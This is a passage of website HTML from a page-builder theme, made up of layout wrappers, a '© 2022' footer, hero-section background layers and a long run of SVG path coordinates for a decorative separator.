style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path 